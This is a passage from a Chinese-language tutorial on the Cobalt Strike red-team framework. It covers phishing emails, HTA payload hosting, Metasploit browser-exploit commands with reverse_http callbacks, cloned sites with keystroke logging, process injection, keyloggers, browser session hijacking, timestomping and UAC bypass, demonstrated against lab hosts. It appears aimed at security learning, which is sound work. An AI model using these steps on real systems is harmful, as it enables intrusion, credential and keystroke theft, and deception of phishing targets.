</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-7.png" alt=""></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-6.png" alt=""></p> <p>如果提示没有socat命令，安装一下即可。重定向器设置好之后，就新建一个HTTP Beacon，并把重定向器添加到HTTP Hosts主机列表中</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-8.png" alt=""></p> <p>此时可以测试一下重定向器是否正常工作，在CS中打开 View --&gt; Web Log，之后浏览器访问CS服务器地址，也就是这里的192.168.175.129</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-9.png" alt=""></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-10.png" alt=""></p> <p>可以看到CS是能够正常接收到流量的，说明重定向器已经配置OK了，此时按照上面创建一个HTTP Beacon的操作，创建一个HTTP Beacon，并在靶机中运行</p> <p>当靶机上线的时候，观察靶机中的流量，可以看到与靶机连接的也是重定向器的IP</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-11.png" alt=""></p> <p>在CS中也可以看到上线主机的外部IP也是重定向器的IP，此时如果关闭一个重定向器，系统依旧可以正常工作。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-12.png" alt=""></p> <p>由于笔者在学习CS过程中，所看的教程使用的是3.x版本的CS，而我使用的是4.0版本的CS。因此域名配置实操部分是自己参考网上大量文章并多次尝试后的结果，所以难免出现错误之处，要是表哥发现文中错误的地方，欢迎留言指正。</p> <h2 id="_6、攻击载荷安全特性">6、攻击载荷安全特性 <a href="#_6、攻击载荷安全特性" class="header-anchor">#</a></h2> <p>1、在Beacon传输Payload到目标上执行任务时都会先验证团队服务器，以确保Beacon只接受并只运行来自其团队服务器的任务，并且结果也只能发送到其团队服务器。</p> <p>2、在刚开始设置Beacon Payload时，CS会生成一个团队服务器专有的公私钥对，这个公钥嵌入在Beacon的Payload Stage中。Beacon使用团队服务器的公钥来加密传输的元数据，这个元数据中一般包含传输的进程ID、目标系统IP地址、目标主机名称等信息，这也意味着只有团队服务器才能解密这个元数据。</p> <p>3、当Beacon从团队服务器下载任务或团队服务器接收Beacon输出时，团队服务器将会使用Beacon生成的会话密钥来加密任务并解密输出。</p> <p>4、值得注意的是，Payload Stagers 因为其体积很小，所以没有这些安全特性。</p> <h1 id="_0x03-目标攻击">0x03 目标攻击 <a href="#_0x03-目标攻击" class="header-anchor">#</a></h1> <h2 id="_1、客户端攻击">1、客户端攻击 <a href="#_1、客户端攻击" class="header-anchor">#</a></h2> <p><strong>什么是客户端攻击</strong></p> <p>客户端攻击根据教程直译过来就是针对“用于查看攻击者所控制内容的应用程序”发起的一种攻击。</p> <p><code>原文：A client-side attack is an attack against an application used to view attacker controlled content.</code></p> 
<p><strong>为什么要进行客户端攻击</strong></p> <p>随着时代发展到了今天，在有各种WAF、防火墙的情况下，各种漏洞已经很难像过去那么好被利用了，攻击者想绕过防火墙发动攻击也不是那么容易的了。</p> <p>而当我们发送一个钓鱼文件到客户端上，再由客户端打开这个文件，最后客户端穿过防火墙回连到我们，此时在客户端上我们就获得了一个立足点<code>foothold</code>。这样的一个过程是相对而言是较为容易的，这也是为什么要进行客户端攻击。</p> <p><strong>如何获得客户端上的立足点</strong></p> <p>1、尽可能多的了解目标环境，即做好信息收集工作</p> <p>2、创建一个虚拟机，使它与目标环境尽可能的一致，比如操作系统、使用的浏览器版本等等都需要保证严格一致</p> <p>3、攻击刚刚创建的虚拟机，这会是最好的攻击目标</p> <p>4、精心策划攻击方法，达到使目标认为这些攻击行为都是正常行为的效果</p> <p>5、将精心制作的钓鱼文件发送给目标，比如钓鱼邮件</p> <p>如果这五步都非常细致精心的去准备，那么攻击成功的概率会大幅提升。</p> <h2 id="_2、系统侦察">2、系统侦察 <a href="#_2、系统侦察" class="header-anchor">#</a></h2> <p>系统侦察<code>System Profiler</code>是一个方便客户端攻击的侦察工具，这个工具将会在CS服务端上启动一个Web服务，这样当目标访问这个Web服务的时候，我们就能够看到目标使用的浏览器、操作系统等等指纹信息。</p> <p>设置系统侦察需要首先在自己的VPS服务器上运行CS服务端，之后本地客户端进行连接，选择<code>System Profiler</code>功能模块，配置待跳转的URL等信息即可。</p> <p>如果勾选了<code>Use Java Applet to get information</code>则可以发现目标的Java版本及内网IP地址，但是这样做被发现的风险就会提高，同时现在浏览器已经默认关闭了java执行权限，因此这个选项的作用也变得不大了。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs8-1.png" alt=""></p> <p>配置完后，当用户打开配置后的链接，我们可以在三个地方进行观察</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>1、View --&gt; Applications
2、View --&gt; Web Log
3、Cobalt Strike --&gt; Visualization --&gt; Target Table
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>目标用户打开链接时，我们在CS上就能够看到目标使用的浏览器版本、系统版本等信息了，知道了版本信息，就能够进一步知道目标上可能存在什么漏洞。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs8-2.png" alt=""></p> <p>值得注意的一点是如果 Cobalt Strike 的 web 服务器收到了lynx、wget 或 curl 的请求，CS会自动返回一个 404 页面，这样做是为了防御蓝队的窥探。</p> <h2 id="_3、cobalt-strike-的攻击方式">3、Cobalt Strike 的攻击方式 <a href="#_3、cobalt-strike-的攻击方式" class="header-anchor">#</a></h2> <p><strong>用户驱动攻击</strong></p> <p>用户驱动攻击<code>User-Driven Attacks</code>需要欺骗用户产生交互才行，但也有许多的优点。</p> <p>首先用户驱动攻击不依赖漏洞利用代码，所以用户系统上的安全补丁对它是没用的；其次无论目标使用什么版本的程序，我们都可以创建相应的功能来执行；最后因为用户驱动攻击十分可靠，也使得它很完美。</p> <p>当我们采取行动来追踪并需要攻击时，它就像用户本地执行程序一样，CS为我们提供了几个用户驱动攻击的选项，分别如下：</p> <h3 id="用户驱动攻击包">用户驱动攻击包 <a href="#用户驱动攻击包" class="header-anchor">#</a></h3> <p>用户驱动攻击包<code>User-Driven Attacks Packages</code>功能打开位置：<code>Attacks --&gt; Packages</code></p> <p><strong>1、HTML应用</strong></p> <p>HTML应用<code>HTML Application</code>生成(executable/VBA/powershell)这3种原理不同的VBScript实现的<code>evil.hta</code>文件。</p> <p><strong>2、Microsoft Office 宏文件</strong></p> <p>Microsoft Office 宏文件<code>Microsoft Office Document Macros</code>可以生成恶意宏放入office文件，非常经典的攻击手法。</p> <p><strong>3、Payload 生成器</strong></p> <p>Payload生成器<code>Payload Generator</code>可以生成各种语言版本的Payload，便于进行免杀。</p> <p><strong>4、Windows 可执行文件</strong></p> <p>Windows 可执行文件<code>Windows Executable</code> 会生成一个Windows可执行文件或DLL文件。默认x86，勾选x64表示包含x64 payload stage，生成了artifactX64.exe(17kb) artifactX64.dll(17kb)</p> <p><strong>5、Windows 可执行文件（Stageless）</strong></p> <p>Windows 可执行文件（Stageless）<code>Windows Executable (Stageless)</code>会生成一个不分阶段的Windows可执行文件或DLL文件。其中的 Stageless 表示把包含payload在内的&quot;全功能&quot;被控端都放入生成的可执行文件beaconX64.exe(313kb) beaconX64.dll(313kb) beacon.ps1(351kb)</p> <h3 id="用户驱动的web交付攻击">用户驱动的Web交付攻击 <a href="#用户驱动的web交付攻击" class="header-anchor">#</a></h3> <p>用户驱动Web交付攻击<code>User-Driven Web Drive-by 
Attacks</code>功能打开位置：<code>Attacks --&gt; Web Drive-by</code></p> <p><strong>1、java 签名 applet 攻击</strong></p> <p>java 签名 applet 攻击<code>Java Signed Applet Attack</code>会启动一个Web服务以提供自签名Java Applet的运行环境，浏览器会要求用户授予applet运行权限，如果用户同意则实现控制，但目前该攻击方法已过时。</p> <p><strong>2、Java 智能 Applet 攻击</strong></p> <p>Java 智能 Applet 攻击<code>Java Smart Applet Attack</code>会自动检测Java版本并利用已知的漏洞绕过安全沙箱，但CS官方称该攻击的实现已过时，在现在的环境中无效。</p> <p><strong>3、脚本化 Web 交付</strong></p> <p>脚本化 Web 交付<code>Scripted Web Delivery</code> 为payload提供web服务以便于下载和执行，类似于MSF的Script Web Delivery</p> <p><strong>4、托管文件</strong></p> <p>托管文件<code>Host File</code>通过<code>Attacks --&gt; Web Drive-by --&gt; Host File</code>进行配置，攻击者可以通过这个功能将文件上传到CS服务端上，从而进行文件托管。</p> <p>如果想删除上传到CS服务端上的文件，可以到<code>Attacks --&gt; Web Drive-by --&gt; Manage</code>下进行删除。</p> <p>如果想查看谁访问了这些文件，可以到<code>View --&gt; Web Log</code>下进行查看。</p> <h2 id="_4、开始攻击">4、开始攻击 <a href="#_4、开始攻击" class="header-anchor">#</a></h2> <h3 id="html-应用攻击">HTML 应用攻击 <a href="#html-应用攻击" class="header-anchor">#</a></h3> <p>首先来到<code>Attacks --&gt; Packages --&gt; HTML Application</code>创建一个HTML应用，如果没有创建监听的话，还需要创建一个监听。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs8-3.png" alt=""></p> <p>HTML应用文件生成好后，来到<code>Attacks --&gt; Web Drive-by --&gt; Host File</code>，选择刚才生成的文件，最后点击Launch，复制CS创建的链接，在目标主机上打开此链接。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs8-4.png" alt=""></p> <p>当在目标主机上提示是否运行时，点击运行。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs8-5.png" alt=""></p> <p>当该文件在目标上运行后，CS客户端上就可以看到回连的会话了。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs8-6.png" alt=""></p> <h3 id="msf-与-cs-的结合利用">MSF 与 CS 的结合利用 <a href="#msf-与-cs-的结合利用" class="header-anchor">#</a></h3> <p>如果想使用MSF对目标进行漏洞利用，再通过这个漏洞来传输Beacon的话，也是可以的。</p> <p>1、首先在MSF上选择攻击模块</p> <p>2、接着在MSF上设置Payload为<code>windows/meterpreter/reverse_http</code>或者<code>windows/meterpreter/reverse_https</code>，这么做是因为CS的Beacon与MSF的分阶段协议是相兼容的。</p> 
<p>3、之后在MSF中设置Payload的LHOST、LPORT为CS中Beacon的监听器IP及端口。</p> <p>4、然后设置 <code>DisablePayloadHandler</code> 为 True，此选项会让 MSF 避免在其内起一个 handler 来服务你的 payload 连接，也就是告诉MSF说我们已经建立了监听器，不必再新建监听器了。</p> <p>5、再设置 <code>PrependMigrate</code> 为 True，此选项让 MSF 前置 shellcode 在另一个进程中运行 payload stager。如果被利用的应用程序崩溃或被用户关闭，这会帮助 Beacon 会话存活。</p> <p>6、最后运行<code>exploit -j</code>，-j 是指作为job开始运行，即在后台运行。</p> <p><strong>操作</strong></p> <p>在CS中新建一个HTTP Beacon，创建过程不再赘述。</p> <p>1、在MSF中选择攻击模块，根据教程这里选择的<code>adobe_flash_hacking_team_uaf</code>模块，不过个人感觉现在这个模块已经不太能被利用成功了。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>use exploit/multi/browser/adobe_flash_hacking_team_uaf
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>2、接着配置payload，这里选择reverse_http payload</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>set payload windows/meterpreter/reverse_http
set LHOST cs_server_ip
set LPORT 80
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>3、之后，配置<code>DisablePayloadHandler</code>、<code>PrependMigrate</code>为 True</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>set DisablePayloadHandler True
set PrependMigrate True
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>4、最后，开始攻击。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>exploit -j
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs9-1.png" alt=""></p> <h3 id="伪装-克隆网站">伪装—克隆网站 <a href="#伪装-克隆网站" class="header-anchor">#</a></h3> <p>在向目标发送漏洞程序之前，我们将自己进行伪装一下，这样可以更好的保护自己，同时提高成功率。CS上有个克隆网站的功能，能够较好的帮助到我们。</p> <p>首先，来到<code>Attacks --&gt; Web Drive-by --&gt; Clone Site</code>下，打开克隆网站的功能，之后写入待克隆网站的URL，在Attack中写入MSF中生成的URL。</p> <p>其中<code>Log keystrokes on cloned site</code>选项如果勾选则可以获取目标的键盘记录，记录结果在Web Log中能够查看。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs9-2.png" alt=""></p> <p>之后，浏览器打开克隆站点地址，如果目标存在漏洞，就可以被利用了，同时在CS中也会观察到主机上线。</p> <h2 id="_5、鱼叉式网络钓鱼">5、鱼叉式网络钓鱼 <a href="#_5、鱼叉式网络钓鱼" class="header-anchor">#</a></h2> <p>用CS进行钓鱼需要四个步骤：</p> <p>1、创建一个目标清单</p> <p>2、制作一个邮件模板或者使用之前制作好的模板</p> <p>3、选择一个用来发送邮件的邮件服务器</p> <p>4、发送邮件</p> <p><strong>目标清单</strong></p> <p>目标清单就是每行一个邮件地址的txt文件，即每行包含一个目标。</p> <p>在一行中除了邮件地址也可以使用标签或一个名字。如果提供了名称，则有助于 Cobalt Strike 自定义每个网络钓鱼。</p> <p>这里使用一些在线邮件接收平台的邮箱地址作为示例。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>astrqb79501@chacuo.net	test1
gswtdm26180@chacuo.net	test2
ypmgin95416@chacuo.net	test3
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>将以上内容保存为txt文本文件，就创建好了自己的目标清单。</p> <p><strong>模板</strong></p> <p>使用模板的好处在于可以重复利用，制作钓鱼模板也很简单。</p> <p>首先可以自己写一封邮件发给自己，或者直接从自己收件箱挑选一个合适的。有了合适的邮件之后，查看邮件原始信息，一般在邮件的选项里能找到这个功能。最后将邮件的原始信息保存为文件，一个模板就制作完成了。</p> <p><strong>发送邮件</strong></p> <p>有了目标和模板，然后选好自己的邮件服务器，之后就可以发送消息了。</p> <p>在CS客户端中，点击<code>Attacks --&gt; Spear Phish</code>即可打开网络钓鱼模块。添加上目标、模板、钓鱼地址、邮箱服务、退回邮箱，其中Bounce To为退回邮件接收地址，注意要和配置邮件服务器时填的邮箱一致，否则会报错。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs9-3.png" alt=""></p> <p>所有信息添加完成后，可以点击Preview查看。如果感觉效果不错，就可以点击send发送了。</p> <p>当目标收到钓鱼邮件，并且点击钓鱼邮件中的链接后，如果钓鱼链接配置的没有问题，CS就能够上线了。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs9-4.png" alt=""></p> <p>由于此处是仅作为测试用途，所以模板中的链接都是自己的本地内网CS服务器地址，如果是真实环境中，则自然需要使用公网的地址才行。</p> <p>在真实环境中的钓鱼邮件也不会像这里这么浮夸，真实环境中的钓鱼邮件往往都伪装成和正经儿的邮件一模一样，单从表面上看很难看出区别，因此提高自己的安全意识还是很重要滴。</p> <h1 id="_0x04-后渗透">0x04 后渗透 <a href="#_0x04-后渗透" class="header-anchor">#</a></h1> <h2 id="_1、beacon-的管理">1、Beacon 的管理 <a href="#_1、beacon-的管理" class="header-anchor">#</a></h2> <p><strong>Beacon 控制台</strong></p> <p>在一个 Beacon 会话上右击 <code>interact</code>（交互）即可打开 Beacon 控制台，如果想对多个会话进行控制，也只需选中多个会话，执行相关功能即可。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs10-1.png" alt=""></p> <p>在 Beacon 的控制台中的输入与输出之间，是一个状态栏，状态栏上的信息分别是：目标 NetBIOS 名称、用户名、会话PID以及 Beacon 最近一次连接到 CS 团队服务器的时间。</p> <p>Beacon 控制台是在使用 CS 的过程中，很经常用到的功能，向 Beacon 发出的每个命令，都可以在这里看到，如果队友发送了消息，在 Beacon 控制台同样能看到，消息前还会显示队友的名称。</p> <p><strong>Beacon 菜单</strong></p> <p>Access：包含了一些对凭据的操作及提权的选项</p> <p>Explore：包含了信息探测与目标交互的选项</p> <p>Pivoting：包含了一些设置代理隧道的选项</p> <p>Session：包含了对当前 Beacon 会话管理的选项</p> <p><strong>Beacon 命令</strong></p> <p>help：查看 Beacon 命令的帮助信息。使用 help + 待查看帮助的命令可查看该命令的帮助信息。</p> <p>clear：清除 Beacon 命令队列。Beacon 是一个异步的 Payload，输入的命令并不会立即执行，而是当 Beacon 连接到团队服务器时再一一执行命令，因此当需要清除队列命令时就可以使用 clear 命令。</p> 
<p>sleep：改变 Beacon 的休眠时间。输入 <code>sleep 30</code>表示休眠30秒；输入<code>sleep 60 50</code>表示，随机睡眠 30秒至60秒，其中30秒 = 60 x 50%；如果输入 <code>sleep 0</code>则表示进入交互模式，任何输入的命令都会被立即执行，当输入一些命令，比如<code>desktop</code>时， Beacon 会自动进入交互模式。</p> <p>shell：通过受害主机的 cmd.exe 执行命令。比如运行<code>ipconfig</code>，就需要输入<code>shell ipconfig</code></p> <p>run：不使用 cmd.exe 执行命令。该命令也是 run + 命令的形式运行，该命令会将执行结果回显。</p> <p>execute：执行命令，但不回显结果。</p> <p>cd：切换当前工作目录。</p> <p>pwd：查看当前所在目录。</p> <p>powershell：通过受害主机的 PowerShell 执行命令。比如想在 PowerShell 下运行 <code>ipconfig</code>，就需要输入<code>powershell ipconfig</code></p> <p>powerpick：不使用 powershell.exe 执行 powershell 命令。这个命令依赖于由 Lee Christensen 开发的非托管 PowerShell 技术。powershell 和 powerpick 命令会使用当前令牌（ token ）。</p> <p>psinject：将非托管的 PowerShell 注入到一个特定的进程中并从此位置运行命令。</p> <p>powershell-import：导入 PowerShell 脚本到 Beacon 中。直接运行 powershell-import + 脚本文件路径即可，但是这个脚本导入命令一次仅能保留一个 PowerShell 脚本，再导入一个新脚本的时候，上一个脚本就被覆盖了，因此可以通过导入一个空文件来清空 Beacon 中导入的脚本。</p> <p>powershell get-help：获取 PowerShell 命令的相关帮助信息。比如想获取 PowerShell 下 get-process 命令的帮助，就需要输入<code>powershell get-help get-process</code></p> <p>execute-assembly：将一个本地的 .NET 可执行文件作为 Beacon 的后渗透任务来运行。</p> <p>setenv：设置一个环境变量。</p> <h2 id="_2、会话传递">2、会话传递 <a href="#_2、会话传递" class="header-anchor">#</a></h2> <p><strong>会话传递相关命令</strong></p> <p>Beacon 被设计的最初目的就是向其他的 CS 监听器传递会话。</p> <p><code>spawn</code>：进行会话的传递，也可直接右击会话选择<code>spawn</code>命令进行会话的选择。默认情况下，<code>spawn</code>命令会在 rundll32.exe 中派生一个会话。为了更好的隐蔽性，可以找到更合适的程序（如 Internet Explorer） 并使用<code>spawnto</code>命令来说明在派生新会话时候会使用 Beacon 中的哪个程序。</p> <p><code>spawnto</code>：该命令会要求指明架构（x86 还是 x64）和用于派生会话的程序的完整路径。单独输入<code>spawnto</code>命令然后按 enter 会指示 Beacon 恢复至其默认行为。</p> <p><code>inject</code>：输入<code>inject + 进程 id + 监听器名</code>来把一个会话注入一个特定的进程中。使用 ps 命令来获取一个当前系统上的进程列表。使用<code>inject [pid] x64</code>来将一个64位 Beacon 注入到一个 64位进程中。</p> <p><code>spawn</code>和<code>inject</code>命令都将一个 payload stage 注入进内存中。如果 payload stage 是 HTTP、HTTPS 或 DNS Beacon 并且它无法连接到你，那么将看不到一个会话。如果 payload stage 是一个绑定的 TCP 或 SMB 的 
Beacon，这些命令会自动地尝试连接到并控制这些 payload。</p> <p><code>dllinject</code>：<code>dllinject + [pid]</code>来将一个反射式 DLL 注入到一个进程中。</p> <p><code>shinject</code>：使用<code>shinject [pid] [架构] [/路径/.../file.bin]</code>命令来从一个本地文件中注入 shellcode 到一个目标上的进程中。</p> <p><code>shspawn</code>：使用<code>shspawn [架构] [/路径/.../file.bin]</code>命令会先派生一个新进程（这个新进程是 <code>spawnto</code> 命令指定的可执行文件），然后把指定的 shellcode 文件（ file.bin ）注入到这个进程中。</p> <p><code>dllload</code>：使用<code>dllload [pid] [c:\路径\...\file.dll]</code>来在另一个进程中加载磁盘上的 DLL文件。</p> <p><strong>会话传递使用场景</strong></p> <p>1、将当前会话传递至其他CS团队服务器中，直接右击<code>spawn</code>选择要传递的监听器即可。</p> <p>2、将当前会话传递至MSF中，这里简单做一下演示。</p> <p>首先，在MSF中，为攻击载荷新建一个 handler（监听器）</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>msf5 &gt; use exploit/multi/handler
msf5 exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_https
msf5 exploit(multi/handler) &gt; set lhost 192.168.175.156
msf5 exploit(multi/handler) &gt; set lport 443
msf5 exploit(multi/handler) &gt; exploit -j
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>随后，在CS中新建一个外部<code>Foreign</code>监听器，这里设置的监听IP与端口和MSF中的一致即可，随后在CS中利用<code>spawn</code>选择刚新建的外部监听器，MSF中即可返回会话。</p> <h2 id="_3、文件系统">3、文件系统 <a href="#_3、文件系统" class="header-anchor">#</a></h2> <p>浏览会话系统文件位置在右击会话处，选择 <code>Explore --&gt; File Browser</code>即可打开。在这里可以对当前会话下的文件进行浏览、上传、下载、删除等操作。</p> <p>在进行文件浏览时，如果 beacon 设置的 sleep 值较高，CS会因此而变得响应比较慢。</p> <p>彩色文件夹表示该文件夹的内容位于此文件浏览器的缓存中；深灰色的文件夹表示该文件夹的内容不在此文件浏览器缓存中。</p> <p><strong>文件下载</strong></p> <p><code>download</code>：下载请求的文件。Beacon 会下载它的任务要求获取的每一个文件的固定大小的块。这个块的大小取决于 Beacon 当前的数据通道。HTTP 和 HTTPS 通道会拉取 512kb 的数据块。</p> <p><code>downloads</code>：查看当前 Beacon 正在进行的文件下载列表。</p> <p><code>cancel</code>：该命令加上一个文件名来取消正在进行的一个下载任务。也可以在 cancel 命令中使用通配符来一次取消多个文件下载任务。</p> <p>下载文件都将下载到CS团队服务器中，在<code>View --&gt; Download</code>下可看到下载文件的记录，选中文件后使用<code>Sync Files</code>即可将文件下载到本地。</p> <p><strong>文件上传</strong></p> <p><code>upload</code>：上传一个文件到目标主机上。</p> <p><code>timestomp</code>：将一个文件的修改属性访问属性和创建时间数据与另一个文件相匹配。当上传一个文件时，有时会想改变此文件的时间戳来使其混入同一文件夹下的其他文件中，使用timestomp 命令就可以完成此工作。</p> <h2 id="_4、用户驱动溢出攻击">4、用户驱动溢出攻击 <a href="#_4、用户驱动溢出攻击" class="header-anchor">#</a></h2> <p>Beacon 运行任务的方式是以<code>jobs</code>去运行的，比如键盘记录、PowerShell 脚本、端口扫描等，这些任务都是在 beacon check in 之间于后台运行的。</p> <p><code>jobs</code>：查看当前 Beacon 中的任务</p> <p><code>jobkill</code>：加上任务 ID，对指定任务进行停止</p> <p><strong>屏幕截图</strong></p> <p><code>screenshot</code>：获取屏幕截图，使用<code>screenshot pid</code>来将截屏工具注入到一个 x86 的进程中，使用<code>screenshot pid x64</code>注入到一个 x64 进程中，explorer.exe 是一个好的候选程序。</p> <p>使用<code>screenshot [pid] [x86|x64] [time]</code>来请求截屏工具运行指定的秒数，并在每一次 Beacon 连接到团队服务器的时候报告一张屏幕截图，这是查看用户桌面的一种简便方法。要查看截屏的具体信息，通过<code>View --&gt; Screenshots</code>来浏览从所有 Beacon 会话中获取的截屏。</p> <p><strong>键盘记录</strong></p> 
<p><code>keylogger</code>：键盘记录器，使用<code>keylogger pid</code>来注入一个 x86 程序。使用<code>keylogger pid x64</code>来注入一个 x64 程序，explorer.exe 是一个好的候选程序。</p> <p>使用单独的 keylogger 命令来将键盘记录器注入一个临时程序。键盘记录器会监视从被注入的程序中的键盘记录并将结果报告给 Beacon，直到程序终止或者自己杀死了这个键盘记录后渗透任务。要查看键盘记录的结果，可以到<code>View --&gt; Keystrokes</code>中进行查看。</p> <p><strong>其他</strong></p> <p>除了上述使用命令的方式进行屏幕截图和键盘记录，也可以来到<code>Explore --&gt; Process List</code>下选择要注入的进程，再直接点击屏幕截图或键盘记录的功能按钮。</p> <p>从使用上，具体注入那个程序都是可以的，只是注入 explorer.exe 会比较稳定与持久。值得注意的是，多个键盘记录器可能相互冲突，每个桌面会话只应使用一个键盘记录器。</p> <h2 id="_5、浏览器转发">5、浏览器转发 <a href="#_5、浏览器转发" class="header-anchor">#</a></h2> <p>浏览器转发是指在已经攻击成功的目标中，利用目标的信息登录网站进行会话劫持，但是目前只支持目标正在使用IE浏览器的前提下。关于如何判断当前用户是否使用IE浏览器，则可以通过屏幕截图来判断。如下图中，通过屏幕截图可以看到目标正在使用IE浏览器登陆着当前网站的admin账户。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs11-1.png" alt=""></p> <p>找到目前正在使用IE浏览器的目标后，右击该会话，选择<code>Explore --&gt; Browser Pivot</code>，随后选择要注入的进程，CS 会在它认为可以注入的进程右边显示一个对勾，设置好端口后，点击运行即可。</p> <p>此时，在浏览器中配置代理，代理配置为http代理，IP为CS团队服务器IP，端口为刚设置的端口。</p> <p>代理配置好后，在浏览器中打开目标当前正在打开的网址，即可绕过登录界面。</p> <h2 id="_6、端口扫描">6、端口扫描 <a href="#_6、端口扫描" class="header-anchor">#</a></h2> <p><code>portscan</code>：进行端口扫描，使用参数为：<code>portscan [targets] [ports] [discovery method]</code>。</p> <p>目标发现<code>discovery method</code>有三种方法，分别是：<code>arp、icmp、none</code>，<code>arp</code>方法使用 ARP 请求来发现一个主机是否存活。<code>icmp</code>方法发送一个 ICMP echo 请求来检查一个目标是否存活。<code>none</code>选项让端口扫描工具假设所有的主机都是存活的。</p> <p>端口扫描会在 Beacon 和团队服务器通讯的这个过程中不停运行。当它有可以报告的结果，它会把结果发送到 Beacon 控制台。Cobalt Strike 会处理这个信息并使用发现的主机更新目标模型。</p> <p>右击 Beacon会话，在<code>Explore --&gt; Port Scan</code>中即可打开端口扫描的图形窗口，CS会自动填充扫描地址，确认扫描地址、端口、扫描方式等无误后，开始扫描即可。扫描结束后，在 target table页面中可看到扫描结果，右击会话，选择 Services 可查看详细的扫描结果。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs11-2.png" alt=""></p> <h1 id="_0x05-提权">0x05 提权 <a href="#_0x05-提权" class="header-anchor">#</a></h1> <h2 id="_1、用户账户控制">1、用户账户控制 <a href="#_1、用户账户控制" class="header-anchor">#</a></h2> <p>自 Windows vista 开始，Windows 
系统引进了用户账户控制机制，即 UAC<code>User Account Control</code>机制，UAC 机制在 Win 7中得到了完善。UAC 与 UNIX 中的 sudo 工作机制十分相似，平时用户以普通权限工作，当用户需要执行特权操作时，系统会询问他们是否要提升权限。</p> <p>此时系统用户可分为以下三种等级：</p> <p>高：管理员权限</p> <p>中：一般用户权限</p> <p>低：受限制的权限</p> <p>使用<code>whoami /groups</code>命令可以看到当前用户所在的组以及权限，使用<code>net localgroup administrators</code>可以查看当前在管理员组里的用户名。</p> <h2 id="_2、提权操作">2、提权操作 <a href="#_2、提权操作" class="header-anchor">#</a></h2> <p>当某些操作需要管理员权限，而当前用户权限只有一般用户权限时，就需要提权操作了。</p> <p>在 CS 中有以下几种提权操作：</p> <p><code>bypassuac</code>：将本地中级管理员权限提升至本地高级管理员权限，适用于Win 7 及以上的系统。</p> <p><code>elevate</code>：将任意用户的权限提升至系统权限，适用于2018年11月更新之前的 Win 7 和 Win 10 系统。</p> <p><code>getsystem</code>：将本地高级管理员权限提升至系统权限。</p> <p><code>runas</code>：使用其他用户的凭证来以其他用户身份运行一个命令，该命令不会返回任何输出。</p> <p><code>spawnas</code>：使用其他用户的凭证来以其他用户身份派生一个会话，这个命令派生一个临时的进程并将 payload stage 注入进那个进程。</p> <h3 id="spawn-as">Spawn As <a href="#spawn-as" class="header-anchor">#</a></h3> <p>首先，右击待提权的会话，选择<code>Access --&gt; Spawn As</code>，输入目标系统用户身份信息，其中域信息填写一个“点”代表本地用户，监听器这里选择的是 SMB 监听器，之后点击运行就能看到对应的用户上线了。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs12-1.png" alt=""></p> <h3 id="bypass-uac">Bypass UAC <a href="#bypass-uac" class="header-anchor">#</a></h3> <p>Bypass UAC 有两个步骤，分别是：</p> <p>1、利用 UAC 漏洞来获取一个特权文件副本</p> <p>2、使用 DLL 劫持进行代码执行</p> <p>首先使用<code>shell whoami /groups</code>查看当前上线主机用户的所属组及 UAC 等级</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs13-1.png" alt=""></p> <p>通过返回信息可以看出，当前用户为管理员权限，UAC 等级为中，根据上一节中的介绍，此时可以使用<code>bypassuac</code>进行提权。</p> <p>首先，右击会话，选择<code>Access --&gt; Elevate</code>，这里选择一个 SMB Beacon，Exploit 选择<code>uac-token-duplication</code>，最后 Launch 即可。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs13-2.png" alt=""></p> <p>待 Beacon Check in 后，当前用户 UAC 为高权限的会话便会上线了。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs13-3.png" alt=""></p> <h2 id="_3、powerup">3、PowerUp <a href="#_3、powerup" class="header-anchor">#</a></h2> <p>PowerUp 所做的事是寻找可能存在弱点的地方，从而帮助提权。</p> 
